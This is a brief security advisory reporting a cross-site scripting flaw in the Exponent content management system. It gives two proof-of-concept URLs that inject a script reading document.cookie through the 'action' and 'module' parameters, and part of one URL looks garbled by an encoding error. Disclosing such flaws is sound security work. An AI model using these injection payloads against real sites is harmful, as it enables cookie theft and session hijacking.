Exponent is an open source content management system designed
primarily for non-technical types. Its website is at
http://www.exponentcms.org/


Exponent suffers from a Cross Site scripting (XSS) vulnerability;

http://[host]/[folder]/index.php?module=newsmodule&src=@random41940a897e943∫=&
action=<script>alert(document.cookie)</script>

http://[host]/[folder]/index.php?module=<script>
alert(document.cookie)</script>&src=@random41940a897e943&#8747;=&action=



FNSE advisory
http://fnse.be.tt

Watch out for my new book "How to Make Unhackable French Fries"

RB9